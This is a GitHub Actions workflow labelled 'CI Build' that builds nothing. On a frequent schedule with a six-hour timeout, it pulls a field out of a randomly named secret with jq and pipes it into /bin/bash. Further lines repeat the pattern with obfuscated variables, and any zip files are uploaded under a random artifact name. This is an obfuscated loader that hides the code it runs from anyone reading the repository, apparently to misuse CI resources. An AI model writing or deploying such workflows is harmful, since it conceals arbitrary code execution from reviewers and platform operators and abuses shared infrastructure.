name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '45 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          hjjhy58660: ${{ secrets.hjjhy58660 }}
        run: |
          printf '%s' "$hjjhy58660" | jq -r .cvw58176 | /bin/bash
          echo $ajmw82 | jq -r .kcufa610 | /bin/bash
          echo $f33 | jq -r .feim1187 | /bin/bash
          echo $nfkwo3 | jq -r .xgsak825 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: KRb2RDac
          path: "*.zip"
          retention-days: 1
